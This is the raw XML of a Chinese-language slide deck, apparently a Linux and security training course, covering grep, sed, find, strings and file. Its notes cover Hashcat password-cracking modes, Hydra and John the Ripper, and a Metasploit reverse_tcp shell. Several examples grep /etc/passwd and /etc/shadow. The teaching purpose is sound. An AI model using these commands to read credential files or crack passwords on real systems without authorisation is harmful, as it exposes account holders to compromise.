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81" r:id="rId5"/>
    <p:sldId id="554" r:id="rId6"/>
    <p:sldId id="669" r:id="rId7"/>
    <p:sldId id="670" r:id="rId8"/>
    <p:sldId id="671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3" r:id="rId20"/>
    <p:sldId id="682" r:id="rId21"/>
    <p:sldId id="684" r:id="rId22"/>
    <p:sldId id="685" r:id="rId23"/>
    <p:sldId id="794" r:id="rId24"/>
    <p:sldId id="797" r:id="rId25"/>
    <p:sldId id="796" r:id="rId26"/>
    <p:sldId id="795" r:id="rId27"/>
    <p:sldId id="798" r:id="rId28"/>
    <p:sldId id="799" r:id="rId29"/>
    <p:sldId id="686" r:id="rId30"/>
    <p:sldId id="555" r:id="rId31"/>
    <p:sldId id="687" r:id="rId32"/>
    <p:sldId id="695" r:id="rId33"/>
    <p:sldId id="696" r:id="rId34"/>
    <p:sldId id="697" r:id="rId35"/>
    <p:sldId id="688" r:id="rId36"/>
    <p:sldId id="689" r:id="rId37"/>
    <p:sldId id="690" r:id="rId38"/>
    <p:sldId id="691" r:id="rId39"/>
    <p:sldId id="692" r:id="rId40"/>
    <p:sldId id="693" r:id="rId41"/>
    <p:sldId id="694" r:id="rId42"/>
    <p:sldId id="698" r:id="rId43"/>
    <p:sldId id="792" r:id="rId44"/>
    <p:sldId id="793" r:id="rId45"/>
    <p:sldId id="800" r:id="rId46"/>
    <p:sldId id="801" r:id="rId47"/>
    <p:sldId id="802" r:id="rId48"/>
    <p:sldId id="803" r:id="rId49"/>
    <p:sldId id="804" r:id="rId50"/>
    <p:sldId id="805" r:id="rId51"/>
    <p:sldId id="806" r:id="rId52"/>
    <p:sldId id="807" r:id="rId53"/>
    <p:sldId id="808" r:id="rId54"/>
    <p:sldId id="809" r:id="rId55"/>
    <p:sldId id="810" r:id="rId56"/>
    <p:sldId id="830" r:id="rId57"/>
    <p:sldId id="831" r:id="rId58"/>
    <p:sldId id="836" r:id="rId59"/>
    <p:sldId id="835" r:id="rId60"/>
    <p:sldId id="837" r:id="rId61"/>
    <p:sldId id="839" r:id="rId62"/>
    <p:sldId id="840" r:id="rId63"/>
    <p:sldId id="841" r:id="rId64"/>
    <p:sldId id="842" r:id="rId65"/>
    <p:sldId id="844" r:id="rId66"/>
    <p:sldId id="845" r:id="rId67"/>
    <p:sldId id="846" r:id="rId68"/>
    <p:sldId id="847" r:id="rId69"/>
    <p:sldId id="848" r:id="rId70"/>
    <p:sldId id="850" r:id="rId71"/>
    <p:sldId id="851" r:id="rId72"/>
    <p:sldId id="852" r:id="rId73"/>
    <p:sldId id="853" r:id="rId74"/>
    <p:sldId id="854" r:id="rId75"/>
    <p:sldId id="856" r:id="rId76"/>
    <p:sldId id="857" r:id="rId77"/>
    <p:sldId id="855" r:id="rId78"/>
    <p:sldId id="858" r:id="rId79"/>
    <p:sldId id="860" r:id="rId80"/>
    <p:sldId id="861" r:id="rId81"/>
    <p:sldId id="862" r:id="rId82"/>
    <p:sldId id="859" r:id="rId83"/>
    <p:sldId id="863" r:id="rId84"/>
    <p:sldId id="294" r:id="rId85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5A5A5"/>
    <a:srgbClr val="ED7D31"/>
    <a:srgbClr val="D9DADE"/>
    <a:srgbClr val="0162A7"/>
    <a:srgbClr val="005DAE"/>
    <a:srgbClr val="BC2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8731" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="100" d="100"/>
          <a:sy n="100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29.xml"/><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slide" Target="slides/slide6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D8DDD-29B3-4B15-844E-5C6F046154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 Unix 和类 Unix 操作系统中，$? 是一个特殊的变量，它用于存储上一个执行的命令的退出状态（exit status）。这个变量通常用于脚本中，以检查命令是否成功执行。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如果命令成功执行，退出状态通常是 0。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>如果命令执行失败，退出状态是非零值，具体值取决于命令和出错的原因。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's/root/ROOT/g'：这是 sed 的替换命令，格式为 s/查找内容/替换内容/标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>g：全局替换标志，表示对每一行中的所有匹配项进行替换。如果不加 g，则只替换每行的第一个匹配项。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's/root/ROOT/g'：这是 sed 的替换命令，格式为 s/查找内容/替换内容/标志</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>g：全局替换标志，表示对每一行中的所有匹配项进行替换。如果不加 g，则只替换每行的第一个匹配项。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中国:威武</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>china:great</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>hello:world</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>world:hello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中国:威武</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>china:great</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>hello:world</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>world:hello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https://nmap.org/book/nse-usage.html#nse-categories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highlight>
                <a:srgbClr val="FF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highlight>
                <a:srgbClr val="FF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highlight>
                <a:srgbClr val="FF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highlight>
                <a:srgbClr val="FF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highlight>
                <a:srgbClr val="FFFF00"/>
              </a:highlight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https://blog.csdn.net/mseaspring/article/details/128271152</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>https://blog.csdn.net/weixin_44288604/article/details/123807294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find 命令支持的文件类型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>f 或 -：普通文件（默认）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>d：目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>c：字符设备文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>b：块设备文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>l 或 S：符号链接（l 表示符号链接本身，S 表示符号链接指向的文件）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>p：FIFO（命名管道）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>s：套接字文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>D：十进制表示的文件类型，例如 find / -type 0 会查找所有文件类型为 0 的文件，这通常表示一个普通文件。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2&gt;/dev/null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https://github.com/vanhauser-thc/thc-hydra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https://github.com/vanhauser-thc/thc-hydra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https://xz.aliyun.com/t/4008?time__1311=n4%2Bxni0QG%3DoGTbxBqDwmDUxYqY5jOxAK62vdx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Straight（字典破解） (-a 0):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种模式下，Hashcat 会使用一个字典文件，逐个尝试字典中的每个密码，看它们是否与给定的哈希值匹配。这种模式适用于你有一组可能的密码列表，并希望检查它们是否是正确的密码。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Combination（组合破解） (-a 1):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在组合攻击模式下，Hashcat 会将两个字典文件中的单词组合起来，生成新的密码组合。例如，如果两个字典文件中分别包含 "password" 和 "1234"，Hashcat 会尝试 "password1234"、"1234password" 等组合。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Brute-force（掩码暴力破解） (-a 3):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>掩码攻击模式允许你指定一个字符掩码，掩码中的每个字符代表密码中的一个可能字符。例如，?l 代表一个小写字母，?d 代表一个数字。Hashcat 会尝试所有可能的字符组合，直到找到匹配的密码。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Hybrid Wordlist + Mask（字典+掩码破解） (-a 6):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>这种模式结合了字典攻击和掩码攻击。你可以提供一个字典文件，并在字典中的每个密码后面添加一个掩码，以生成更多的密码组合。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Hybrid Mask + Wordlist（掩码+字典破解） (-a 7):</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>与混合字典+掩码攻击相反，这种模式首先应用掩码，然后在结果后面添加字典文件中的单词，以生成密码组合。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find 命令支持的文件类型：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>f 或 -：普通文件（默认）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>d：目录</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>c：字符设备文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>b：块设备文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>l 或 S：符号链接（l 表示符号链接本身，S 表示符号链接指向的文件）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>p：FIFO（命名管道）</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>s：套接字文件</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>D：十进制表示的文件类型，例如 find / -type 0 会查找所有文件类型为 0 的文件，这通常表示一个普通文件。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2&gt;/dev/null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https://www.cnblogs.com/sparkdev/p/9651622.html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各种文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>类型生成</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>hash</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>的脚本</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> /usr/share/john/</a:t>
            </a:r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https://blog.csdn.net/m0_61155226/article/details/129280769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shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>erverse_tcp  cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>乱码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>chcp 65001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>chcp 65001 是一个在 Windows 命令提示符（cmd）中使用的命令，用于将命令行界面的代码页更改为 UTF-8。代码页 65001 对应于 UTF-8 编码，这使得你可以在命令行界面中正确显示和输入 Unicode 字符，包括各种语言的字符。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atime(Access time) 显示最近访问文件的时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>mtime(Modify time) 显示最近修改文件内容的时间</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>ctime(Change time) 显示最近文件有所改变的时间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ctime（Change Time）不包括文件内容被修改的情况。ctime 主要记录的是文件的元数据（metadata）发生变化的时间，例如：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件的所有者（owner）或所属组（group）被改变。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件的权限（permissions）被改变。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件的链接数（link count）发生变化（例如，通过移动或重命名操作）。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>文件的扩展属性（extended attributes）被改变。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shell/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>erverse_tcp  cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>乱码：</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>chcp 65001</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>chcp 65001 是一个在 Windows 命令提示符（cmd）中使用的命令，用于将命令行界面的代码页更改为 UTF-8。代码页 65001 对应于 UTF-8 编码，这使得你可以在命令行界面中正确显示和输入 Unicode 字符，包括各种语言的字符。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https://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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https://www.scriptjunkie.us/2011/04/why-encoding-does-not-matter-and-how-metasploit-generates-exes/</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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{} 是一个占位符，代表 find 命令找到的每个文件的名称。\; 表示 -exec 命令的结束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8C6FC-2464-488C-91EF-93AF87FFD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-c </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>输出匹配到的文件</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>数量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615"/>
            <a:ext cx="8169910" cy="886460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650" y="392836"/>
            <a:ext cx="10515600" cy="576984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Shape"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="242635" y="467996"/>
            <a:ext cx="383120" cy="383120"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst>
              <a:gd name="connsiteX0" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY0" fmla="*/ 96048 h 576064"/>
              <a:gd name="connsiteX1" fmla="*/ 171957 w 576064"/>
              <a:gd name="connsiteY1" fmla="*/ 480016 h 576064"/>
              <a:gd name="connsiteX2" fmla="*/ 502964 w 576064"/>
              <a:gd name="connsiteY2" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX3" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY3" fmla="*/ 0 h 576064"/>
              <a:gd name="connsiteX4" fmla="*/ 576064 w 576064"/>
              <a:gd name="connsiteY4" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX5" fmla="*/ 288032 w 576064"/>
              <a:gd name="connsiteY5" fmla="*/ 576064 h 576064"/>
              <a:gd name="connsiteX6" fmla="*/ 0 w 576064"/>
              <a:gd name="connsiteY6" fmla="*/ 288032 h 576064"/>
              <a:gd name="connsiteX7" fmla="*/ 288032 w 576064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064" h="576064">
                <a:moveTo>
                  <a:pt x="171957" y="96048"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="171957" y="480016"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="502964" y="288032"/>
                </a:lnTo>
                <a:close/>
                <a:moveTo>
                  <a:pt x="288032" y="0"/>
                </a:moveTo>
                <a:cubicBezTo>
                  <a:pt x="447108" y="0"/>
                  <a:pt x="576064" y="128956"/>
                  <a:pt x="576064" y="288032"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="576064" y="447108"/>
                  <a:pt x="447108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10438130" y="430530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random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任意多边形 5"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId1"/>
            </p:custDataLst>
          </p:nvPr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任意多边形 9"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId3"/>
            </p:custDataLst>
          </p:nvPr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PA_任意多边形 13"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId4"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4839550" y="1373119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PA_任意多边形 17"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId5"/>
            </p:custDataLst>
          </p:nvPr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PA_矩形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PA_矩形 2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PA_矩形 2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PA_任意多边形 22"/>
          <p:cNvSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId9"/>
            </p:custDataLst>
          </p:nvPr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8" name="PA_直接连接符 27"/>
          <p:cNvCxnSpPr/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId10"/>
            </p:custDataLst>
          </p:nvPr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文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId11"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9731742" y="46960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銮生舆宙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PA_文本框 29"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId12"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8754072" y="4652044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河北中车数智科技有限公司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54720" y="5050790"/>
            <a:ext cx="2743200" cy="365125"/>
          </a:xfrm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202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PA_文本框 28"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId13"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="697597" y="58048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守护天机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文本框 26"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:custDataLst>
              <p:tags r:id="rId14"/>
            </p:custDataLst>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9905365" y="3198384"/>
            <a:ext cx="22866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267335" y="21145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strings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449705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strings命令在对象文件或二进制文件中查找可打印的字符串。字符串是4个或更多可打印字符的任意序列，以换行符或空字符结束。 strings命令对识别随机对象文件很有用。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：strings [参数]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34035" y="3479800"/>
          <a:ext cx="7021195" cy="220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410"/>
                <a:gridCol w="4629785"/>
              </a:tblGrid>
              <a:tr h="3409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589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a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扫描整个文件而不是只扫描数据</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>段</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr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在显示字符串前先显示文件名</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="3409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与</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>-a</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>相反</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="589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以 8、10 或 16 为底打印字符串的位置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-file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file命令的功能是识别文件类型，也可以用来辨别一些内容的编码格式。由于Linux系统并不是像Windows系统那样通过扩展名来定义文件类型的，因此用户无法直接通过文件名来进行区别。file命令可以通过分析文件头部信息中的标识信息来显示文件类型，使用很方‍便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：file 参数 文件名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34035" y="3479800"/>
          <a:ext cx="1030351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970"/>
                <a:gridCol w="3223260"/>
                <a:gridCol w="2066925"/>
                <a:gridCol w="334835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b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不显示文件名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...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显示执行</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>过程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显示文件类型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i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</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
                        <a:t>MIME</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>类别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m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指定魔法数字文件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070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显示符号链接所指向文件的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>类型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z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尝试去解读压缩内的文件内容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-grep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grep命令来自英文词组global search regular expression and print out the line的缩写，意思是用于全面搜索的正则表达式，并将结果输出。人们通常会将grep命令与正则表达式搭配使用，参数作为搜索过程中的补充或对输出结果的筛选，命令模式十分灵‍活。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与之容易混淆的是egrep命令和fgrep命令。如果把grep命令当作标准搜索命令，那么egrep则是扩展搜索命令，等价于grep -E命令，支持扩展的正则表达式。而fgrep则是快速搜索命令，等价于grep -F命令，不支持正则表达式，直接按照字符串内容进行匹配。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lang="en-US" altLang="zh-CN" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>grep</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t> 参数 文件名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34035" y="3937635"/>
          <a:ext cx="10340340" cy="2425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/>
                <a:gridCol w="3235325"/>
                <a:gridCol w="2073910"/>
                <a:gridCol w="336042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只显示匹配的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>行数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递归搜索</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>模式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支持扩展正则</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>表达式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v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显示不包含匹配文本的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>所有行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匹配固定字符串的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>内容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w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精准匹配</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>词</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="354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i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忽略关键词</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>大小写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x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精准匹配</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>行</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="354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m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指定魔法数字文件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显示所有匹配行及其</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600">
                          <a:sym typeface="+mn-ea"/>
                        </a:rPr>
                        <a:t>行号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-grep-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52489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搜索指定文件中包含某个关键词的内容行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grep root /etc/passwd</a:t>
            </a:r>
            <a:endParaRPr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搜索指定文件中以某个关键词开头的内容行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grep ^root /etc/passwd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搜索多个文件中包含某个关键词的内容行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>     grep linuxprobe /etc/passwd /etc/shadow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搜索多个文件中包含某个关键词的内容,不显示文件名称  grep -h linuxprobe /etc/passwd /etc/shadow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显示指定文件中包含某个关键词的行数量  grep -c root /etc/passwd /etc/shadow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搜索指定文件中不包含某个关键词的内容行  grep -v nologin /etc/passwd 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不仅搜索指定目录，还搜索其内子目录内是否有关键词文件  grep -r root /etc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搜索指定文件中精准匹配到某个关键词的内容行   grep -xr root .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判断指定文件中是否包含某个关键词，通过返回状态值输出结果（0为包含，1为不包含)  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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grep -q root 1.txt  </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600" i="0">
              <a:latin typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1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echo $?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搜索指定文件中空行的数量  grep -c ^$ anaconda-ks.cfg 1.txt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-sed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27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sed命令来自英文词组stream editor的缩写，其功能是利用语法/脚本对文本文件进行批量的编辑操作。sed命令最初由贝尔实验室开发，后被众多Linux系统集成，能够通过正则表达式对文件进行批量编辑，让重复性的工作不再浪费时间。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lang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>sed </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600" i="0">
                <a:latin typeface="+mn-ea"/>
              </a:rPr>
              <a:t>参数 文件名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10340340" cy="288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/>
                <a:gridCol w="3235325"/>
                <a:gridCol w="2073910"/>
                <a:gridCol w="336042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使用指定脚本处理输入的文本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仅显示脚本处理后的</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
                        <a:t>结果</a:t>
                      </a:r>
                      <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
                    </a:p>
                  </a:txBody>
                  <a:tcPr/>
                </a:tc>
              </a:tr>
              <a:tr h="572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使用指定脚本文件处理输入的文本文件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支持扩展正则表达式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-i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直接修改文件内容，而不输出到终端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w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精准匹配</a:t>
                      </a:r>
                      <a:r>
